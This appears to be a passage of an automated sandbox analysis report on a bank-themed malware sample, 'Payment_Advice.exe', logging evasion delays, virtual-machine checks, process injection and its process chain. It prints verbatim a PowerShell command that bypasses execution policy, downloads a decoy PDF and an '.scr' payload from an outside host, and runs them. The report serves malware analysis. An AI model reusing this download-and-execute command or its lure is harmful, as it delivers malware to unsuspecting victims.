            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 600000
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599889
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599773
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599664
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599554
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599440
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599324
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 598007
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597881
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597766
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597613
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597444
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597304
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597189
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597080
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596952
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596840
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596715
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596600
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596484
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596362
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596250
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596138
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596012
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595898
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595787
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595643
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595531
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595409
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595284
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595079
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593976
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593862
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593706
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593596
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593456
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593303
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593190
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593065
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592940
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592815
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592690
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592565
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592440
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592315
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592190
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592065
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591940
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591815
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591690
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591565
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591440
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591315
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591190
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 589105
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeWindow / User API: threadDelayed 466Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6693Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3192Jump to behavior
            Source: C:\Windows\Temp\hadvices.scrWindow / User API: threadDelayed 2822
            Source: C:\Windows\Temp\hadvices.scrWindow / User API: threadDelayed 6968
            Source: C:\Users\user\Desktop\Payment_Advice.exe TID: 6428Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exe TID: 1664Thread sleep count: 466 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6480Thread sleep time: -11990383647911201s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6028Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 7400Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8268Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep count: 37 > 30
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -34126476536362649s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -600000s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -599889s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8520Thread sleep count: 2822 > 30
            Source: C:\Windows\Temp\hadvices.scr TID: 8520Thread sleep count: 6968 > 30
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -599773s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -599664s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -599554s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -599440s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -599324s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -598007s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -597881s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -597766s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -597613s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -597444s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -597304s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -597189s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -597080s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -596952s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -596840s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -596715s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -596600s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -596484s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -596362s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -596250s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -596138s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -596012s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -595898s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -595787s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -595643s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -595531s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -595409s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -595284s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -595079s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -593976s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -593862s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -593706s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -593596s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -593456s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -593303s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -593190s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -593065s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -592940s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -592815s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -592690s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -592565s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -592440s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -592315s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -592190s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -592065s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -591940s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -591815s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -591690s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -591565s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -591440s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -591315s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -591190s >= -30000s
            Source: C:\Windows\Temp\hadvices.scr TID: 8516Thread sleep time: -589105s >= -30000s
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
            Source: C:\Users\user\Desktop\Payment_Advice.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 922337203685477
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 922337203685477
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 600000
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599889
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599773
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599664
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599554
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599440
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 599324
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 598007
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597881
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597766
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597613
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597444
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597304
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597189
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 597080
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596952
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596840
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596715
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596600
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596484
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596362
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596250
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596138
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 596012
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595898
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595787
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595643
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595531
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595409
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595284
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 595079
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593976
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593862
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593706
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593596
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593456
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593303
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593190
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 593065
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592940
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592815
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592690
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592565
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592440
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592315
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592190
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 592065
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591940
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591815
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591690
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591565
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591440
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591315
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 591190
            Source: C:\Windows\Temp\hadvices.scrThread delayed: delay time: 589105
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile opened: C:\Users\user\AppData\Local\Temp\9D53.tmpJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile opened: C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmpJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile opened: C:\Users\user~1\Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile opened: C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.tmpJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
            Source: hadvices.scr, 00000019.00000002.2450723926.0000000001432000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
            Source: svchost.exe, 00000008.00000002.2453208093.000001E16762B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
            Source: wscript.exe, 00000003.00000002.1469711134.0000028FCBC10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: svchost.exe, 00000008.00000002.2456259290.000001E16CC5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Payment_Advice.exe, 00000002.00000002.1471316804.0000000001405000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&22H
            Source: Payment_Advice.exe, 00000002.00000002.1471316804.0000000001405000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_`
            Source: powershell.exe, 00000004.00000002.1463761116.000001B4E9A62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_0040A3D2 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,2_2_0040A3D2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Temp\hadvices.scrProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_00409570 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,2_2_00409570
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 2_2_00409590 SetUnhandledExceptionFilter,2_2_00409590
            Source: C:\Users\user\Desktop\Payment_Advice.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            .NET source code references suspicious native API functions
            Source: 0.2.Payment_Advice.exe.57b0000.5.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 0.2.Payment_Advice.exe.57b0000.5.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 0.2.Payment_Advice.exe.57b0000.5.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
            Bypasses PowerShell execution policy
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\Payment_Advice.exeMemory written: C:\Users\user\Desktop\Payment_Advice.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\Temp\hadvices.scrMemory written: C:\Windows\Temp\hadvices.scr base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess created: C:\Users\user\Desktop\Payment_Advice.exe "C:\Users\user\Desktop\Payment_Advice.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\sysnative\wscript.exe" C:\Users\user\AppData\Local\Temp\9D53.tmp\9D54.tmp\9D55.vbs //Nologo Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/Payment_Advice.pdf' -OutFile 'C:\Users\Public\Payment_Advice.pdf'; Start-Process 'C:\Users\Public\Payment_Advice.pdf'; Invoke-WebRequest -Uri 'https://advising-receipts.com/hsbc/hadvices.scr' -OutFile 'C:\Windows\Temp\hadvices.scr'; Start-Process 'C:\Windows\Temp\hadvices.scr'"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Payment_Advice.pdf"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Temp\hadvices.scr "C:\Windows\Temp\hadvices.scr" /SJump to behavior
            Source: C:\Windows\Temp\hadvices.scrProcess created: C:\Windows\Temp\hadvices.scr "C:\Windows\Temp\hadvices.scr"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -command "invoke-webrequest -uri 'https://advising-receipts.com/hsbc/payment_advice.pdf' -outfile 'c:\users\public\payment_advice.pdf'; start-process 'c:\users\public\payment_advice.pdf'; invoke-webrequest -uri 'https://advising-receipts.com/hsbc/hadvices.scr' -outfile 'c:\windows\temp\hadvices.scr'; start-process 'c:\windows\temp\hadvices.scr'"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -command "invoke-webrequest -uri 'https://advising-receipts.com/hsbc/payment_advice.pdf' -outfile 'c:\users\public\payment_advice.pdf'; start-process 'c:\users\public\payment_advice.pdf'; invoke-webrequest -uri 'https://advising-receipts.com/hsbc/hadvices.scr' -outfile 'c:\windows\temp\hadvices.scr'; start-process 'c:\windows\temp\hadvices.scr'"Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeQueries volume information: C:\Users\user\Desktop\Payment_Advice.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\Temp\hadvices.scrQueries volume information: C:\Windows\Temp\hadvices.scr VolumeInformation
            Source: C:\Windows\Temp\hadvices.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Temp\hadvices.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Temp\hadvices.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Temp\hadvices.scrQueries volume information: C:\Windows\Temp\hadvices.scr VolumeInformation
            Source: C:\Windows\Temp\hadvices.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Temp\hadvices.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Temp\hadvices.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Temp\hadvices.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
